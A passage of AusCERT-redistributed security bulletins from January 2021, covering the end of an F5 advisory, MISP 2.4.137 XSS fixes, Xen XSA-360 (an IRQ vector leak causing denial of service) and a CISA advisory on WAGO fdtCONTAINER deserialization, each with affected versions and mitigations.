vulnerability by upgrading to a version listed in the Fixes introduced in column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists. Mitigation BIG-IP This impacts vCMP systems with single-core guests and BIG-IP VE systems running on unpatched CPUs. For BIG-IP VE systems, responsibility for preventing these attacks falls on the hypervisor/host platform, which is outside the scope of the ability of F5 to support or patch. To mitigate this issue, contact your cloud provider or hypervisor vendor to ensure their platforms or products are not subject to this vulnerability. For vCMP systems, to mitigate this vulnerability, you should configure vCMP guests to use at least two cores so that physical CPUs are not shared among guests. Traffix Intel is releasing firmware updates to mitigate this potential vulnerability. To mitigate this vulnerability, you can update to the latest firmware provided by Intel. For more information, refer to Intel Security Advisory INTEL-SA-00317 . Note: This link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge. Supplemental Information o K51812227: Understanding Security Advisory versioning o K41942608: Overview of Security Advisory articles o K4602: Overview of the F5 security vulnerability response policy o K4918: Overview of the F5 critical issue hotfix policy o K9502: BIG-IP hotfix and point release matrix o K13123: Managing BIG-IP product hotfixes (11.x - 15.x) o K167: Downloading software and firmware from F5 o K9970: Subscribing to email notifications regarding F5 products o K9957: Creating a custom RSS feed to view new and updated documents - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYApiseNLKJtyKPYoAQjFiA//R7nSIAYfdFpW0Pe1dZdRcq74QFe2G724 Y1gG15IFPWbGrBtAQgcHmXM06WwbNVNNBiHm/snAmSh+7AP7GueloV/W77xCstQG eobriRqah7JiqoJ4TzynilMCv9Gs71k1SjMmfMV1MGf6QRhepqpg/3Brr/lYGC5/ 3KrjzTe7bREb09wiKC9aur8+awixD0m4SzjRbPS1p8yojI2QE9pLCFNN7v+/SXUR O61q24iYsSqYELZNAMfy9wwhIgAaEKgMB926AMTqIYC3bzsGiJCzctEVbUazbvI0 SssMNImya+dN4o6k5TZVd49SOCI0XFEmcUgQYbx1eSwpUCqL93yi9CDV6VXGpwKl 3yjOspUv6SfEw1RYtlXdX6TWXrBJL2nEzH17n8nkHI5E+GyZBCi1mR4Nuet8UCL1 j00wX4JJVcilk2X8Yi7+Resu7eUZNYNS1EmtqLQks5J5ZbarOdR6VRF9RjpsZ8X2 ut67VqGpXNA38C77GW6GdA4rOI/RZedECvkO4gj+FWHLPnQpII9ZYXhMzKE9KPlr Wvkioc8z27amRE1C+TKOHmCNbr0RyRo6s20UqdDB42T2kQ/JvzCLGpfRjL6Tu1yb 2oTR9xCVHIVO4c5h/hDF2YlHOWQylX9HhYyXwcQuvxrYJebWIhVYxAwuXXOXa6xi REUgv+S0h1Y= =B1fi -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0264 MISP 2.4.137 released (New exclusion module for the correlation engine, many improvements and security vulnerabilities resolved) 22 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: MISP Publisher: MISP Operating System: Windows UNIX variants (UNIX, Linux, OSX) Impact/Access: Cross-site Scripting -- Remote with User Interaction Reduced Security -- Remote with User Interaction Resolution: Patch/Upgrade CVE Names: CVE-2021-25325 CVE-2021-25324 CVE-2021-25323 CVE-2021-3184 Original Bulletin: https://www.misp-project.org/2021/01/20/MISP.2.4.137.released.html - --------------------------BEGIN INCLUDED TEXT-------------------- MISP 2.4.137 released We have released 2.4.137, a security and bug fix release including a collection of fixes and improvements collected over the past month. Building tools for the security community sure has its perks - over the past week we have received two independent security test results of two separate organisations, revealing several vulnerabilities. The update to this version is therefore highly recommended. A little note on vulnerability - we always welcome organisations helping us secure MISP and our tooling in general and would hereby like to thank everyone taking part in the process! Several vulnerabilities resolved o [CVE-2021-25324] Stored XSS via the galaxy cluster view - Discovered by Daniel Kubica of ESET, spol. s r.o. o [CVE-2021-25325] Stored XSS via the galaxy element index - Discovered by Daniel Kubica of ESET, spol. s r.o. o [CVE-2021-25323] Weak default password change request policy not requiring the entry of the current password - Discovered by Daniel Kubica of ESET, spol. s r.o. o [CVE-2021-3184] Reflected XSS via the set homepage button - Reported by an anonymous party A long list of quality of life improvements o The synchronisation now compresses the data exchanged, improving the transfer rates during the exchange o Additional metrics and comparison tools for the sync connections o Better management of API key usage along with logging o A new tool that allows the exclusion of certain values from the correlation engine (useful to avoid having regularly observed values recurring in a large number of events generating too much noise) Along with many other fixes. A special thank you to @JakubOnderka for providing a steady stream of QoL improvements, making MISP more pleasant to use by the day! Acknowledgement We would like to thank all the contributors, reporters and users who have helped us in the past months to improve MISP and information sharing at large. This release includes multiple updates in misp-objects, misp-taxonomies and misp-galaxy . As always, a detailed and complete changelog is available with all the fixes, changes and improvements. - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYApP/+NLKJtyKPYoAQjZohAAg1i2C/EsW3zX0y46xvxFAPcRx6H2yw1Z 1zrDw9rhgOEt9myroPmSg/vqDCI7PIgZGZTEQMUHXtRrdnX2ZHJnXFxIsg1MwHtt Nsud2IrNgkuvSd2ejrXHIQStC/9ui3sRH25ZNd1mT1+yzgMTQOfnmyNtjmk4q3HF 7JL5I8FyMIXQ2hr9bE1X0y++HpWsvYe1e/6ZCj0vgsSdPDG7A7AP/Z0JPwEL2cP5 vJYxALsSpUY/wLcIKYCRMlHJ/W3pHytAfJPxcxpsuegh0BKkjwAVwpp27ho6Kcym YuUMbjf62J24q20H+TmeQ7kQrK7sNB7hjsqMBzdXXUq3RiLqOBWAPVEKdXbywwPM EDLpTYgQ49Tzquhmw+7c4ALmJkM/8uzr2kvvwfau1dOBIuXywVZ8kkQ0Kzol6wAJ BQXS30/tE9vvOEw7SSeGWAkQJdLmRbyFhP4PknLtWjZq3kFUGQx5BelwOuXPDI4a jDFatR92P6Hu47TsCCYQuWkbYPRGDbCgI3yccflRGeXn6SEmTFox/OMjNUCRm+E8 f23A/Zic0ZHJpofKZ027avHJoaWkjErCKq8ncYcqbhu47Y3LQEu27jg2BGMCA2Ic v/mnOi2kCy8+/vD0/4JHjMBbHr7tsAwYH4sy2NRLoKYH4Ix83wdj7Xc2TJ/TxozR BFdebvGqCmQ= =uTO6 -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0263 IRQ vector leak on x86 22 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Xen Publisher: Xen Operating System: Linux variants Virtualisation Impact/Access: Denial of Service -- Existing Account Resolution: Patch/Upgrade Original Bulletin: http://xenbits.xen.org/xsa/advisory-360.html - --------------------------BEGIN INCLUDED TEXT-------------------- - -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Xen Security Advisory XSA-360 IRQ vector leak on x86 ISSUE DESCRIPTION ================= A x86 HVM guest with PCI pass through devices can force the allocation of all IDT vectors on the system by rebooting itself with MSI or MSI-X capabilities enabled and entries setup. Such reboots will leak any vectors used by the MSI(-X) entries that the guest might had enabled, and hence will lead to vector exhaustion on the system, not allowing further PCI pass through devices to work properly. IMPACT ====== HVM guests with PCI pass through devices can mount a Denial of Service (DoS) attack affecting the pass through of PCI devices to other guests or the hardware domain. In the latter case this would affect the entire host. VULNERABLE SYSTEMS ================== Xen versions 4.12.3, 4.12.4, and all versions from 4.13.1 onwards are vulnerable. Xen version 4.13.0 and all versions up to 4.12.2 are not affected. Only x86 systems running HVM guests with PCI pass through devices are vulnerable. MITIGATION ========== Not running HVM guests with PCI pass through devices will avoid the vulnerability. Note that even non-malicious guests can trigger this vulnerability as part of normal operation. RESOLUTION ========== Applying the appropriate attached patch resolves this issue. Note that patches for released versions are generally prepared to apply to the stable branches, and may not apply cleanly to the most recent release tarball. Downstreams are encouraged to update to the tip of the stable branch before applying these patches. xsa360.patch xen-unstable xsa360-4.14.patch Xen 4.14 - 4.12 $ sha256sum xsa360* c874ad2b9edb0791ac975735306d055b1916f4acbc59e6f1550fbf33223d6106 xsa360.meta 592f3afda63777d31844e0e34d85fbe387a62d59fa7903ee19b22a98fba68894 xsa360.patch 809515011efb781a2a8742e9acfd76412d3920c2d4142bb187588cd36f77383e xsa360-4.14.patch $ CREDITS ======= This issue was discovered by James McCoy, debugged in combination with Samuel Verschelde of Vates, and recognised as a security issue by Roger Pau Monne of Citrix. NOTE REGARDING LACK OF EMBARGO ============================== This was reported and debugged publicly, before the security implications were apparent. - -----BEGIN PGP SIGNATURE----- iQFABAEBCAAqFiEEI+MiLBRfRHX6gGCng/4UyVfoK9kFAmAJixQMHHBncEB4ZW4u b3JnAAoJEIP+FMlX6CvZh4cH/RyA5POGYEJEj4jHUFK+UmT08Bo6igUBMyJSvAJs T81eb35E2E2I8P35L7q8OOuLIGPWnTXOGPRnwizr2YF7UhmMm/773q5ellShUBgm SHtYl+btRaAp6gXB1PhgiETN3EH3aRgn89YBAQmg3U4Zb1RUiB2P2x6pVEGjMfBw Ks3Zj/ElCtfJcBA6xerNNLuqhwamueCEukw5b8eEHnop+y7TuLordpGGMybpQctx m04lp7zuJDAeshf47wlMQps79Ysx72CaThVKe/9A09z/c2mcR3m+NbieP7PJPggr n1I6QEaSUuapszkj+lC/L05tiyHdjXkoNAHwtdPr8jKtbKo= =YdXv - -----END PGP SIGNATURE----- - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYApP6uNLKJtyKPYoAQiWnhAAjwO45/+aBhgBXphNRfkB8ye9sVwLoSLu qYCYd+Y1myYl+MfvjbqEmCxkU6Qclte8FPeGpCz6/7BKQ5kPCkUkv4PYldsagEjH 6hXX3aMaznQGw9ef5ptP0Q6VwRFWqAggjdQYKUngKIvVysKZp4ydaYw/a5NBQBNP M+uN/1iwVUWkpSErLz3UU7vJw5dOuIZ30Tv3vqTaPHIi3shtvfLFedX4FLhjEAhR g6V+vdP+xKvGm9rJbOHxglbQYuOaeJPTP5i8Jjo/+7II0l3OuNvlgTTVEeSX+5KD oj/SEDWa5IjuPRGmukxmJdY56fjiVlVMyTIsTnPfP45NOZdEnI+0+mQ6RhWIyEQx K3cP2JwjwGZTxOkJ1XnRenJW9jgcbC3DFXF2ufRVXz/D4kCbDrLA4gxZYbHhuZ7y wMyQQXzqcRntLtk9z871Hm9lnjuWqNu2Z6AfNL7QOPP7OzWlGBYliZUmHO5s/Jjq RTEsOPZsYRHlgq/yhGFzCGQOzg5lTiRA+ncLHcet7Tm5e0M54tgKBLHLl8WPV9kv XjEj5iIARR4wEilWvfGDDLicM4K4bsNUwWbDIbHLiCUU63wRjO/Jfn8/WpH8Sjnb 5fknNHQLyGWKkNkM8DC3OJDnZZCT5qFxaL+vPDU4hSh61k1bT0w2ANTf2ZnvF2iD haPeuyt1Rnc= =7+vJ -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0262 Advisory (icsa-21-021-05) WAGO M&M Software fdtCONTAINER 22 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: WAGO M&M Software fdtCONTAINER Publisher: ICS-CERT Operating System: Windows Network Appliance Impact/Access: Execute Arbitrary Code/Commands -- Existing Account Resolution: Patch/Upgrade CVE Names: CVE-2020-12525 Original Bulletin: https://us-cert.cisa.gov/ics/advisories/icsa-21-021-05 - --------------------------BEGIN INCLUDED TEXT-------------------- ICS Advisory (ICSA-21-021-05) WAGO M&M Software fdtCONTAINER Original release date: January 21, 2021 Legal Notice All information products included in https://us-cert.cisa.gov/ics are provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/ . 1. EXECUTIVE SUMMARY o CVSS v3 7.3 o ATTENTION: Low skill level to exploit o Vendor: M&M Software GmbH, a subsidiary of WAGO Kontakttechnik o Equipment: fdtCONTAINER o Vulnerability: Deserialization of Untrusted Data 2. RISK EVALUATION If an attacker can socially engineer a valid user into loading a manipulated project file, malicious code can be executed without notice. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following products are affected: o fdtCONTAINER component Versions between 3.5.0 and 3.5.20304.x Versions between 3.6.0 and 3.6.20304.x Versions older than 3.5 o fdtCONTAINER application Versions between 4.5.0 and 4.5.20304.x Versions between 4.6.0 and 4.6.20304.x Versions older than 4.5 o dtmINSPECTOR Version 3 (Based on FDT 1.2.x) There are reports indicating the following products incorporate the affected component: o Emerson Rosemount Transmitter Interface Software (RTIS) SKUs: 04088-9000-0001, 4088-9000-0002, and 7000003-312 o PEPPERL+FUCHS PACTware 5.0, up to and including Version 5.0.5.31 3.2 VULNERABILITY OVERVIEW 3.2.1 DESERIALIZATION OF UNTRUSTED DATA CWE-502 A vulnerability has been discovered in the fdtCONTAINER component issued by M&M Software and used by other products, including RTIS and PACTware. An attacker might be able to exploit this vulnerability on the workstation running RTIS by supplying/providing a manipulated project file. If that project file is loaded, malicious code can be executed without notice. CVE-2020-12525 has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is ( AV:L/AC:L/PR:L/UI:R/S:U/ C:H/I:H/A:H ). 3.3 BACKGROUND o CRITICAL INFRASTRUCTURE SECTORS: Commercial Facilities, Critical Manufacturing, Energy, Transportation Systems o COUNTRIES/AREAS DEPLOYED: Worldwide o COMPANY HEADQUARTERS LOCATION: Germany 3.4 RESEARCHER Emerson reported this vulnerability to CISA and M&M Software. 4. MITIGATIONS M&M Software recommends users choose one of the following solutions: o Update the fdtCONTAINER component/fdtCONTAINER application to a version that provides a more secure deserialization of the project data. This version will still use a deprecated serialization technology but will fix the currently known attack vector and will be compatible with existing, non-manipulated project files. o Update the fdtCONTAINER component/fdtCONTAINER application to a version (fdtCONTAINER component: 3.7 or newer, fdtCONTAINER application: 4.7 or newer) that provides a secure deserialization of the project data with an updated serialization technology. This will break the compatibility to existing, non-manipulated project files. The CERT@VDE advisory for M&M Software also recommends the following mitigation practices: o Exchange project data only via secure exchange services. o Use appropriate means to protect the project storage from unauthorized manipulation. o Do not open project data from an unknown source. o Reduce the user rights of the host application to the necessary minimum. Emerson recommends users ensure all workstations containing any software used to interact with field instruments be protected using industry cybersecurity best practices. Furthermore, Emerson has made the decision to discontinue RTIS so no additional software updates will be provided. Therefore, Emerson recommends users transition to the free AMS Instrument Inspector software as a replacement device configuration tool. For additional information, please contact Emerson Global Customer Care (24/7 Support) Phone: +1-888-889- 9170 or email: ContactUs@Emerson.com CERT@VDE has published an advisory ( VDE-2021-001 ) for this vulnerability in PEPPERL+FUCHS PACTware. CISA recommends users take the following measures to protect themselves from social engineering attacks: o Ensure the least-privilege user principle is followed. o Do not open project files from untrusted sources. o Do not click web links or open unsolicited attachments in email messages. o Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. o Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on us-cert.cisa.gov . Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies . Additional mitigation guidance and recommended practices are publicly available on the ICS webpage on us-cert.cisa.gov in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies . Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents. No known public exploits specifically target this vulnerability. This vulnerability is not exploitable remotely. For any questions related to this report, please contact the CISA at: Email: CISAservicedesk@cisa.dhs.gov Toll Free: 1-888-282-0870 CISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product. - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYAoWjeNLKJtyKPYoAQjsSQ/5Aa54o7o8qyDknsT+hT4BNNL2LiL6ycKL Byeox1tDWMqxUkb/McPjIeQcXThXs3kROUVb7Vav4vEKOwX6Huj6Ch3ULKJaq2cv OKzEo6Lpnk3e+otQjRoRlgpDH8/Ndl+RKWyO/n1Sja9vU8kCER6Q7HYZkPo10RWb 9hPix+6SEDIUET5rzoX+yi8Jfu0xxAOn/NRg/PCLQZ52gutigdv8GkXhdJGkLSTE IcuSVA4k99VdpDEdt3nVjURdyTELNVEtPNarpKgaJIwwY21cbe2sKoI3U3kMtB8w gqCBhok0SgcREJw7LPFxQUNo70gm2kY9YHPe1reoLy5Jzj7Eiduu/2uWNHUMXqkF PNnV6QB2ySPtMq+sR8T+dyY7tyN0kanF8uS+4oKQZP6b/cW6Aa8kNw/7aYPwazF2 /OzWu37QWgjUjIX2Mj4aeVKqbiPQ+ncxHxWlwB1FEYHdvzJ46MC9nQ4zKJ2V8wFq ZN/LmNhJIUJZkpyg29lCvIAVQJmeg26mA3+shZv2YktQN9/HtMI24+CloKKferQL NkUKo/ho//XbncJt8WjCHmLAoSVJaF9B8o93C5na+Opw7M09lbF/0EeJ25wmDKJ/ PWwE3Dszn+tNJYYfLRaGpFP8/VMfthbu8e1PREhEL0zIvvqBm4GnYEsYb8FQU6Fp PgsQ1l6CC7I= =0IhC -----END PGP SIGNATURE-----